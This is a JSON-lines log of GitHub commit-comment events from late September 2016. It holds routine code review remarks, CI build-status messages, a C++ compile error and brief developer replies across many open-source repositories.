{"id":"4633953098","type":"CommitCommentEvent","actor":{"login":"amcdnl"},"repo":{"name":"jtomaszewski/angular2-data-table"},"payload":{"comment":{"id":19216037,"position":5,"line":41,"path":"src/components/body/Body.ts","commit_id":"8658afe39b440b9583c5537954e1778475f12a21","created_at":"2016-09-28T22:54:30Z","updated_at":"2016-09-28T22:54:30Z","body":"rows have a $$index property you can use for this :)."}},"created_at":"2016-09-28T22:54:30Z"}
{"id":"4633957787","type":"CommitCommentEvent","actor":{"login":"LordNeznay"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19216045,"position":159,"line":159,"path":"Assets/PositionControllers.cs","commit_id":"3fa0ea3aadd6d86803d443d27f73160511db5549","created_at":"2016-09-28T22:55:18Z","updated_at":"2016-09-28T22:55:18Z","body":"deltaTime - это float?\r\nДанный таймаут больше для примера - на деле предполагаю, что должно стриггериться действие (например прыжка) в ответ на событие и события продолжаться только после того, как действие завершится. Т.е. все таймауты будут запрятаны внутрь этого действия"}},"created_at":"2016-09-28T22:55:18Z"}
{"id":"4633968823","type":"CommitCommentEvent","actor":{"login":"Daniel-Griffiths"},"repo":{"name":"Daniel-Griffiths/Vertex"},"payload":{"comment":{"id":19216071,"position":null,"line":null,"path":null,"commit_id":"1b951f79d781691db710d4c43f7a6ec45969fe22","created_at":"2016-09-28T22:57:39Z","updated_at":"2016-09-28T22:57:39Z","body":"Disabling the view test is not a good idea. But its super late and I will make it pass tomorrow :)\r\n\r\nIt all still seems to work fine."}},"created_at":"2016-09-28T22:57:39Z"}
{"id":"4633971773","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19216079,"position":null,"line":null,"path":null,"commit_id":"d5f4dd55904df86add3f0b71629938b9cd581236","created_at":"2016-09-28T22:58:21Z","updated_at":"2016-09-28T22:58:21Z","body":"thanks @farskipper for walking me through this change"}},"created_at":"2016-09-28T22:58:21Z"}
{"id":"4633976299","type":"CommitCommentEvent","actor":{"login":"caiosba"},"repo":{"name":"meedan/check-web"},"payload":{"comment":{"id":19216094,"position":null,"line":null,"path":null,"commit_id":"4162479e78ca0dc6dbed0d2aa3f1996688af1892","created_at":"2016-09-28T22:59:27Z","updated_at":"2016-09-28T22:59:27Z","body":"Looks good, will try to run now."}},"created_at":"2016-09-28T22:59:27Z"}
{"id":"4633978755","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216101,"position":null,"line":null,"path":null,"commit_id":"833794140c562a010327741c01f0aefeb09b3da8","created_at":"2016-09-28T23:00:00Z","updated_at":"2016-09-28T23:00:00Z","body":"develop (evanweaver) - x86_64-MacOS-10.10-clang: OK (2386 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.47%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T23:00:00Z"}
{"id":"4633980867","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"mumuki/mumuki-classroom-api"},"payload":{"comment":{"id":19216104,"position":4,"line":16,"path":"lib/classroom/collection.rb","commit_id":"7107b089b76b1fcd8ea367461b988c34c62ea341","created_at":"2016-09-28T23:00:28Z","updated_at":"2016-09-28T23:00:28Z","body":"@aguspina can we already merge this?"}},"created_at":"2016-09-28T23:00:28Z"}
{"id":"4633984078","type":"CommitCommentEvent","actor":{"login":"mstriemer"},"repo":{"name":"mozilla/addons-server"},"payload":{"comment":{"id":19216117,"position":null,"line":null,"path":null,"commit_id":"2914d6773639f983f6a7148196ff364381ac2e2a","created_at":"2016-09-28T23:01:14Z","updated_at":"2016-09-28T23:01:14Z","body":"This actually fixes #3636 not #3629 as the commit message suggests."}},"created_at":"2016-09-28T23:01:14Z"}
{"id":"4633984147","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216118,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-28T23:01:15Z","updated_at":"2016-09-28T23:01:15Z","body":"iteration (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2360 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.41%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T23:01:15Z"}
{"id":"4633986991","type":"CommitCommentEvent","actor":{"login":"lesliejada"},"repo":{"name":"lesliejada/mi349fall16"},"payload":{"comment":{"id":19216123,"position":null,"line":null,"path":null,"commit_id":"fcb48d410f7dffa44048e9e251cf4750f473d0b7","created_at":"2016-09-28T23:01:56Z","updated_at":"2016-09-28T23:01:56Z","body":"![screen shot 2016-09-28 at 6 15 33 pm](https://cloud.githubusercontent.com/assets/22038875/18935428/0038fc2c-85ae-11e6-8917-36cad315462c.png)\r\n![screen shot 2016-09-28 at 6 57 07 pm](https://cloud.githubusercontent.com/assets/22038875/18935431/03fb3b18-85ae-11e6-96ce-5e10499a0eb1.png)\r\n"}},"created_at":"2016-09-28T23:01:56Z"}
{"id":"4633987359","type":"CommitCommentEvent","actor":{"login":"jcelliott"},"repo":{"name":"jcelliott/toniq"},"payload":{"comment":{"id":19216125,"position":null,"line":null,"path":null,"commit_id":"b32df755896203d8ee6e930c17505e4e10950389","created_at":"2016-09-28T23:02:00Z","updated_at":"2016-09-28T23:02:00Z","body":"I agree, the timeout is not a good solution. Not keeping all jobs in memory is much better. But if you have 100k+ jobs is this kind of thing even the right paradigm?"}},"created_at":"2016-09-28T23:02:00Z"}
{"id":"4633988089","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19216130,"position":159,"line":159,"path":"Assets/PositionControllers.cs","commit_id":"3fa0ea3aadd6d86803d443d27f73160511db5549","created_at":"2016-09-28T23:02:11Z","updated_at":"2016-09-28T23:02:11Z","body":"Да, float\r\n"}},"created_at":"2016-09-28T23:02:11Z"}
{"id":"4634007493","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216189,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-28T23:06:46Z","updated_at":"2016-09-28T23:06:46Z","body":"iteration (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T23:06:46Z"}
{"id":"4634009417","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19216196,"position":6,"line":103,"path":"app/Resources/public/css/base.css","commit_id":"bd552e9f8bb7de6ddd34c4353bd6f8d073278b03","created_at":"2016-09-28T23:07:13Z","updated_at":"2016-09-28T23:07:13Z","body":"@aragonc  Una clase `invisible` que pone los elementos visibles?\r\nNo debería sobrescribir la clase `invisible` de Bootstrap"}},"created_at":"2016-09-28T23:07:13Z"}
{"id":"4634016026","type":"CommitCommentEvent","actor":{"login":"mrworf"},"repo":{"name":"Odinthewanderer/plexupdate"},"payload":{"comment":{"id":19216212,"position":null,"line":null,"path":null,"commit_id":"653588d43cff70c7be483c0149cc413945610993","created_at":"2016-09-28T23:08:52Z","updated_at":"2016-09-28T23:08:52Z","body":"?"}},"created_at":"2016-09-28T23:08:52Z"}
{"id":"4634018516","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19216217,"position":6,"line":103,"path":"app/Resources/public/css/base.css","commit_id":"bd552e9f8bb7de6ddd34c4353bd6f8d073278b03","created_at":"2016-09-28T23:09:28Z","updated_at":"2016-09-28T23:09:28Z","body":"Corregido en f8604f98156ff4928ec8e77946b2aed1c6e31650"}},"created_at":"2016-09-28T23:09:28Z"}
{"id":"4634022030","type":"CommitCommentEvent","actor":{"login":"ThomDietrich"},"repo":{"name":"ThomDietrich/openhabian"},"payload":{"comment":{"id":19216222,"position":89,"line":523,"path":"openhabian-setup.sh","commit_id":"497f6bd14ecc961983a2c4fea05e1d22dd50ffd7","created_at":"2016-09-28T23:10:19Z","updated_at":"2016-09-28T23:10:19Z","body":"fair point. There were other things filling up tmp like GOPATH.  Let's just say these commands you are seeing are from my testing, so don't take details to serious ;) "}},"created_at":"2016-09-28T23:10:19Z"}
{"id":"4634022094","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19216223,"position":null,"line":null,"path":null,"commit_id":"57aacb1b7d525965d5aa14bc0639b32c36aab8ed","created_at":"2016-09-28T23:10:21Z","updated_at":"2016-09-28T23:10:21Z","body":"Still getting debug."}},"created_at":"2016-09-28T23:10:21Z"}
{"id":"4634022713","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19216225,"position":null,"line":null,"path":null,"commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-28T23:10:31Z","updated_at":"2016-09-28T23:10:31Z","body":"Alright sounds good. Give me a couple of days and I'll let you review what I'll cobble together."}},"created_at":"2016-09-28T23:10:31Z"}
{"id":"4634025980","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-lib-monitor"},"payload":{"comment":{"id":19216232,"position":null,"line":null,"path":null,"commit_id":"9b521067ee86a3256497f57e1dea68dac42d1b04","created_at":"2016-09-28T23:11:19Z","updated_at":"2016-09-28T23:11:19Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WInvDAJ2R3yop43dcpKp4w"}},"created_at":"2016-09-28T23:11:19Z"}
{"id":"4634030257","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216242,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T23:12:25Z","updated_at":"2016-09-28T23:12:25Z","body":"iteration (evanweaver) - Win64-Windows-7-VisualStudio-12: OK (2408 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.37%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T23:12:25Z"}
{"id":"4634030520","type":"CommitCommentEvent","actor":{"login":"luizcarraro"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19216243,"position":null,"line":null,"path":null,"commit_id":"d5ba8e848d090ccbd93cd69a3c2b52496e0ff1fb","created_at":"2016-09-28T23:12:30Z","updated_at":"2016-09-28T23:12:30Z","body":"Awesome! I'm realy looking forward for Sails 1. We're using Sails in a lot of our products services. "}},"created_at":"2016-09-28T23:12:30Z"}
{"id":"4634034039","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-lib-monitor"},"payload":{"comment":{"id":19216250,"position":null,"line":null,"path":null,"commit_id":"aa309075dc3405ca2f7351509b5e061bee5b13c8","created_at":"2016-09-28T23:13:27Z","updated_at":"2016-09-28T23:13:27Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MymLDQiVTCqyy56-U52-iQ"}},"created_at":"2016-09-28T23:13:27Z"}
{"id":"4634035432","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216257,"position":23,"line":27,"path":"game.js","commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:13:50Z","updated_at":"2016-09-28T23:13:50Z","body":"I would probably nest this like:\r\n```\r\n<View style={styles.container}>\r\n  <View style={styles.tiles_container}>\r\n    { this.drawTiles() }\r\n  </View>\r\n</View>\r\n```\r\nor\r\n```\r\n<View style={styles.container}>\r\n  <View style={styles.tiles_container}>{ this.drawTiles() }</View>\r\n</View>\r\n```"}},"created_at":"2016-09-28T23:13:50Z"}
{"id":"4634036522","type":"CommitCommentEvent","actor":{"login":"gregorybesson"},"repo":{"name":"TheAlphaNerd/changelog-maker"},"payload":{"comment":{"id":19216259,"position":null,"line":null,"path":null,"commit_id":"25c3eacf7fe77eeba86ba52d85f7208a67ea4171","created_at":"2016-09-28T23:14:09Z","updated_at":"2016-09-28T23:14:09Z","body":"Great to know that it will be merged soon !\r\n\r\nI have submitted a PR for https://github.com/rvagg/commit-stream and will soon submit a PR for changelog-maker adding a \"beautifier\" option (to achieve something like this : https://github.com/olivierlacan/keep-a-changelog/blob/master/CHANGELOG.md)\r\n\r\nWould be great to catch up ! \r\nI've created a CMS based on NodeJS / Express / handlebars which I'd like to demo you: It seems to me quite revolutionary (Wordpress killaaaaaa) but I'd be glad to hear your advices and PoV.\r\n"}},"created_at":"2016-09-28T23:14:09Z"}
{"id":"4634041974","type":"CommitCommentEvent","actor":{"login":"Aeonax"},"repo":{"name":"Aeonax/sample"},"payload":{"comment":{"id":19216270,"position":null,"line":null,"path":null,"commit_id":"150f78451faa618de1e18245e07d56f3c6c2919d","created_at":"2016-09-28T23:15:35Z","updated_at":"2016-09-28T23:15:35Z","body":"Faaail...."}},"created_at":"2016-09-28T23:15:35Z"}
{"id":"4634046878","type":"CommitCommentEvent","actor":{"login":"Nezune"},"repo":{"name":"Tschis/NabBot"},"payload":{"comment":{"id":19216286,"position":null,"line":null,"path":null,"commit_id":"d2921fc5fd219dbb6a915f4f940e14785dfe73f3","created_at":"2016-09-28T23:16:51Z","updated_at":"2016-09-28T23:16:51Z","body":"show!"}},"created_at":"2016-09-28T23:16:51Z"}
{"id":"4634047819","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19216291,"position":null,"line":null,"path":null,"commit_id":"57aacb1b7d525965d5aa14bc0639b32c36aab8ed","created_at":"2016-09-28T23:17:06Z","updated_at":"2016-09-28T23:17:06Z","body":"Also tried with 10.97 and still giving bug.\r\n\r\nJust 10.96 can log in."}},"created_at":"2016-09-28T23:17:06Z"}
{"id":"4634056331","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaMatrices/BandedMatrices.jl"},"payload":{"comment":{"id":19216319,"position":null,"line":null,"path":null,"commit_id":"a104686de271fd8002388b3e597063f5507484bd","created_at":"2016-09-28T23:19:19Z","updated_at":"2016-09-28T23:19:19Z","body":"could do with a test, couldn't it?"}},"created_at":"2016-09-28T23:19:19Z"}
{"id":"4634061057","type":"CommitCommentEvent","actor":{"login":"dlfivefifty"},"repo":{"name":"JuliaMatrices/BandedMatrices.jl"},"payload":{"comment":{"id":19216329,"position":null,"line":null,"path":null,"commit_id":"a104686de271fd8002388b3e597063f5507484bd","created_at":"2016-09-28T23:20:35Z","updated_at":"2016-09-28T23:20:35Z","body":"Yes, you are right...  "}},"created_at":"2016-09-28T23:20:35Z"}
{"id":"4634061584","type":"CommitCommentEvent","actor":{"login":"GabrielTK"},"repo":{"name":"GabrielTK/POGOserver"},"payload":{"comment":{"id":19216332,"position":null,"line":null,"path":null,"commit_id":"a4f421fe0a5c1c801229b0cc18f3c7dea79bdce9","created_at":"2016-09-28T23:20:42Z","updated_at":"2016-09-28T23:20:42Z","body":"It fixes the Terms of Service"}},"created_at":"2016-09-28T23:20:42Z"}
{"id":"4634062729","type":"CommitCommentEvent","actor":{"login":"KroArtem"},"repo":{"name":"Andrettin/Wyrmgus"},"payload":{"comment":{"id":19216336,"position":null,"line":null,"path":null,"commit_id":"d26b186c01081081fe86f365c1ace5a732db70f6","created_at":"2016-09-28T23:21:00Z","updated_at":"2016-09-28T23:21:00Z","body":"This commit introduces problems with compilation under Linux.\r\n```\r\n[ 43%] Building CXX object CMakeFiles/stratagus.dir/src/map/map_fog.cpp.o\r\n/home/kroartem/SVN/Wyrmgus/src/map/map.cpp: In member function ‘void CMapTemplate::Apply(Vec2i&, Vec2i&, int)’:\r\n/home/kroartem/SVN/Wyrmgus/src/map/map.cpp:320:60: error: invalid initialization of non-const reference of type ‘Vec2i& {aka Vec2T<short int>&}’ from an rvalue of type ‘Vec2i {aka Vec2T<short int>}’\r\n     this->Subtemplates[i]->Apply(Vec2i(0, 0), random_pos, z);\r\n                                                            ^\r\n/home/kroartem/SVN/Wyrmgus/src/map/map.cpp:199:6: note:   initializing argument 1 of ‘void CMapTemplate::Apply(Vec2i&, Vec2i&, int)’\r\n void CMapTemplate::Apply(Vec2i &template_start_pos, Vec2i &map_start_pos, int z)\r\n      ^\r\n[ 44%] Building CXX object CMakeFiles/stratagus.dir/src/map/map_radar.cpp.o\r\n[ 44%] Building CXX object CMakeFiles/stratagus.dir/src/map/map_wall.cpp.o\r\nCMakeFiles/stratagus.dir/build.make:2298:\r\n```"}},"created_at":"2016-09-28T23:21:00Z"}
{"id":"4634066651","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19216353,"position":6,"line":103,"path":"app/Resources/public/css/base.css","commit_id":"bd552e9f8bb7de6ddd34c4353bd6f8d073278b03","created_at":"2016-09-28T23:22:03Z","updated_at":"2016-09-28T23:22:03Z","body":"El problema, es que la clase `.invisible` se usa para cambiar el color del texto a gris. Pero Bootstrap la usa **únicamente** para \"esconder\" un elemento, por lo que no debería ser sobreescrita, sino agregar otra clase para \"deshabilitar\" el elemento y cambiarle el color con esa nueva clase o simplemente usar `.text-muted` que ya hace eso.\r\nEstoy borrando los demás casos en que se sobreescribe a `.invisible`"}},"created_at":"2016-09-28T23:22:03Z"}
{"id":"4634069891","type":"CommitCommentEvent","actor":{"login":"ajp8164"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19216364,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-28T23:22:52Z","updated_at":"2016-09-28T23:22:52Z","body":"I'm not familiar with why this change was made.  Alex- can you please elaborate?"}},"created_at":"2016-09-28T23:22:52Z"}
{"id":"4634072815","type":"CommitCommentEvent","actor":{"login":"stgraber"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19216373,"position":4,"line":13,"path":"lxd/container_post.go","commit_id":"57ceee6e94cdbb29242c43633b544f96d51ccb18","created_at":"2016-09-28T23:23:35Z","updated_at":"2016-09-28T23:23:35Z","body":"Should be added to doc/rest-api.md in the POST example."}},"created_at":"2016-09-28T23:23:35Z"}
{"id":"4634073708","type":"CommitCommentEvent","actor":{"login":"BanTheRewind"},"repo":{"name":"cinder/Cinder"},"payload":{"comment":{"id":19216376,"position":null,"line":null,"path":null,"commit_id":"78a6877493cb062f54fbdeb204af868ec4136930","created_at":"2016-09-28T23:23:47Z","updated_at":"2016-09-28T23:23:47Z","body":"After building Cinder with v140 from commit 78a6877493cb062f54fbdeb204af868ec4136930, there is no implementation for `ImageSourceFileStbImage::registerSelf()` or `ImageTargetFileStbImage::registerSelf()` in a v140 project."}},"created_at":"2016-09-28T23:23:47Z"}
{"id":"4634074753","type":"CommitCommentEvent","actor":{"login":"cfloener"},"repo":{"name":"cfloener/docker-templates-DVR"},"payload":{"comment":{"id":19216380,"position":null,"line":null,"path":null,"commit_id":"b6f14180694459a39a05d489abc66e1b83599f33","created_at":"2016-09-28T23:24:04Z","updated_at":"2016-09-28T23:24:04Z","body":"20160928beta1"}},"created_at":"2016-09-28T23:24:04Z"}
{"id":"4634075641","type":"CommitCommentEvent","actor":{"login":"cfloener"},"repo":{"name":"cfloener/docker-templates-DVR"},"payload":{"comment":{"id":19216381,"position":null,"line":null,"path":null,"commit_id":"b6f14180694459a39a05d489abc66e1b83599f33","created_at":"2016-09-28T23:24:17Z","updated_at":"2016-09-28T23:24:17Z","body":"20160928beta1"}},"created_at":"2016-09-28T23:24:17Z"}
{"id":"4634076900","type":"CommitCommentEvent","actor":{"login":"stgraber"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19216384,"position":9,"line":18,"path":"lxd/container_post.go","commit_id":"57ceee6e94cdbb29242c43633b544f96d51ccb18","created_at":"2016-09-28T23:24:38Z","updated_at":"2016-09-28T23:24:38Z","body":"Variable definition not really needed until containerLoadByName"}},"created_at":"2016-09-28T23:24:38Z"}
{"id":"4634077806","type":"CommitCommentEvent","actor":{"login":"ppenzin"},"repo":{"name":"propublica/institute-files"},"payload":{"comment":{"id":19216386,"position":null,"line":null,"path":null,"commit_id":"63a72fda03d4e300d11a428ebabc9062d29ca1e7","created_at":"2016-09-28T23:24:52Z","updated_at":"2016-09-28T23:24:52Z","body":"Apologies for the potential off-topic, but this is such a great introduction to CLI. I always struggle with both \"why\" and \"how\" parts, despite using it every day."}},"created_at":"2016-09-28T23:24:52Z"}
{"id":"4634083404","type":"CommitCommentEvent","actor":{"login":"romanlukichev"},"repo":{"name":"romanlukichev/ArrayReverse"},"payload":{"comment":{"id":19216407,"position":null,"line":null,"path":null,"commit_id":"1bead1b2d9a7ff39c0d606ed151cebb9712542f7","created_at":"2016-09-28T23:26:22Z","updated_at":"2016-09-28T23:26:22Z","body":"![dscf1856 1](https://cloud.githubusercontent.com/assets/18017741/18935931/4163f6cc-8598-11e6-9753-ad9fd65e36a3.JPG)\r\n"}},"created_at":"2016-09-28T23:26:22Z"}
{"id":"4634101690","type":"CommitCommentEvent","actor":{"login":"amolrbhagwat"},"repo":{"name":"airavata-courses/TeamAviato"},"payload":{"comment":{"id":19216448,"position":null,"line":null,"path":null,"commit_id":"effe5b5b0e13bfd84b3ddd8c90ef00749339b53f","created_at":"2016-09-28T23:31:03Z","updated_at":"2016-09-28T23:31:03Z","body":"Fixes #20 "}},"created_at":"2016-09-28T23:31:03Z"}
{"id":"4634106178","type":"CommitCommentEvent","actor":{"login":"ccw808"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19216457,"position":null,"line":null,"path":null,"commit_id":"6b0ed3582a2f92e7b96e74425d84af4a90ac4426","created_at":"2016-09-28T23:32:15Z","updated_at":"2016-09-28T23:32:15Z","body":"You forgot klaxon.wav"}},"created_at":"2016-09-28T23:32:15Z"}
{"id":"4634106884","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19216460,"position":4,"line":5,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T23:32:25Z","updated_at":"2016-09-28T23:32:25Z","body":"@cjpicc11 I've been doing some more research and the way you had it should work as well.  Ever evolving code."}},"created_at":"2016-09-28T23:32:25Z"}
{"id":"4634112577","type":"CommitCommentEvent","actor":{"login":"Jusonex"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19216473,"position":null,"line":null,"path":null,"commit_id":"6b0ed3582a2f92e7b96e74425d84af4a90ac4426","created_at":"2016-09-28T23:33:51Z","updated_at":"2016-09-28T23:33:51Z","body":"Alright, you'll get your klaxon soon! 😛"}},"created_at":"2016-09-28T23:33:51Z"}
{"id":"4634114241","type":"CommitCommentEvent","actor":{"login":"jcodagnone"},"repo":{"name":"zauberlabs/gnip4j"},"payload":{"comment":{"id":19216479,"position":5,"line":44,"path":"core/src/main/java/com/zaubersoftware/gnip4j/api/impl/PowerTrackV2UriStrategy.java","commit_id":"dc89a6de3b290198a77fb9cd31e3cd4380576fb7","created_at":"2016-09-28T23:34:17Z","updated_at":"2016-09-28T23:34:17Z","body":"Good catch! fixed at  ad2c414"}},"created_at":"2016-09-28T23:34:17Z"}
{"id":"4634133588","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216519,"position":37,"line":36,"path":"game.js","commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:39:47Z","updated_at":"2016-09-28T23:39:47Z","body":"You might want to be explicit with order of operations here, although I don't think it matters in this case. Just makes it a bit easier to read:\r\n```\r\nvar key = (row * NUM_WIDE) + col;\r\n```\r\n"}},"created_at":"2016-09-28T23:39:47Z"}
{"id":"4634135302","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19216520,"position":null,"line":null,"path":null,"commit_id":"49c00ff7f1bf81bb09e85a9032ef0ddeb8990e81","created_at":"2016-09-28T23:40:17Z","updated_at":"2016-09-28T23:40:17Z","body":"Wrong looktype."}},"created_at":"2016-09-28T23:40:17Z"}
{"id":"4634135598","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216522,"position":37,"line":36,"path":"game.js","commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:40:22Z","updated_at":"2016-09-28T23:40:22Z","body":"And division/multiplication don't follow PEMDAS, so it is good to be in the habit of wrapping things."}},"created_at":"2016-09-28T23:40:22Z"}
{"id":"4634137663","type":"CommitCommentEvent","actor":{"login":"forrestfiller"},"repo":{"name":"things-nyc/mapthethings-ios"},"payload":{"comment":{"id":19216531,"position":null,"line":null,"path":null,"commit_id":"12489fa9a7969e5abdf4dc371f982c9498021658","created_at":"2016-09-28T23:40:57Z","updated_at":"2016-09-28T23:40:57Z","body":"![success](https://cloud.githubusercontent.com/assets/18606441/18936202/66f0d598-85b3-11e6-855c-d874e08ecdd8.gif)\r\n"}},"created_at":"2016-09-28T23:40:57Z"}
{"id":"4634138238","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216533,"position":42,"line":40,"path":"game.js","commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:41:06Z","updated_at":"2016-09-28T23:41:06Z","body":"Not part of this commit, but this curly should come in a tab width. The next line is at the wrong tab level because of it."}},"created_at":"2016-09-28T23:41:06Z"}
{"id":"4634140360","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216539,"position":36,"line":35,"path":"game.js","commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:41:43Z","updated_at":"2016-09-28T23:41:43Z","body":"This block should come in two spaces to match the tab widths of those above it."}},"created_at":"2016-09-28T23:41:43Z"}
{"id":"4634142268","type":"CommitCommentEvent","actor":{"login":"dzhuang"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19216545,"position":15,"line":738,"path":"course/page/inline.py","commit_id":"e71b8ea272f48cd5b2fe6554bbafbe21a86451c4","created_at":"2016-09-28T23:42:17Z","updated_at":"2016-09-28T23:42:17Z","body":"you are right, they have the same meaning, and  actually I never used that attr."}},"created_at":"2016-09-28T23:42:17Z"}
{"id":"4634146335","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"RobertCNelson/Bootloader-Builder"},"payload":{"comment":{"id":19216556,"position":100,"line":298,"path":"patches/next/0001-am335x_evm-uEnv.txt-bootz-n-fixes.patch","commit_id":"15587f2449937024cd4d9053995758f50b375bfc","created_at":"2016-09-28T23:43:27Z","updated_at":"2016-09-28T23:43:27Z","body":"Turns out production is going to use A5. Can we *please* ignore the last two characters?"}},"created_at":"2016-09-28T23:43:27Z"}
{"id":"4634146574","type":"CommitCommentEvent","actor":{"login":"dzhuang"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19216557,"position":null,"line":null,"path":null,"commit_id":"3b0ddecf529e54e90fe3a841829617a7024809ad","created_at":"2016-09-28T23:43:31Z","updated_at":"2016-09-28T23:43:31Z","body":"thx"}},"created_at":"2016-09-28T23:43:31Z"}
